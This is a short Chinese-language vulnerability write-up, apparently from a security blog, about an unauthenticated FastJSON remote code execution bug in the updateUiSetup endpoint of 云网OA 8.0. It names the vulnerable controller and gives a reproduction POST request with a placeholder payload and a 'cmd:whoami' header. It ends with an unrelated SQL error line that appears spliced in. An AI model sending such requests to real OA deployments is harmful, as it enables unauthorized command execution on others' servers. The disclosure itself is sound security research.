云网OA8.0 updateUiSetup接口存在未授权FastJSON RCE
云网OA8.0 updateUiSetup接口存在未授权FastJSON RCE
基本信息
- Gitee地址:https://gitee.com/bestfeng/oa_git_free
- 部署文档:http://partner.yimihome.com/static/index.html#/index/idea_deploy8
功能点
- src/main/java/com/cloudweb/oa/controller/ApplicationController.java
低版本FastJSON
低版本FastJSON
为什么会存在未授权,因为Filter的配置,这个oa,对于filter chain有点多,有基于spring security,也有原生的Dofilter,感觉偶尔的Chain会乱
这里不登录也是可以访问的
漏洞复现
POST /oa/setup/updateUiSetup?applicationCode=1&uiSetup=payloadHTTP/1.1
Host: 127.0.0.1:8880
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Priority: u=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 18
cmd:whoami
扫描二维码推送至手机访问。
版权声明:本文由UzJu的安全屋发布,如需转载请注明出处。
SQL ERROR: ERROR 1105 (HY000): XPATH syntax error: '~root@localhost'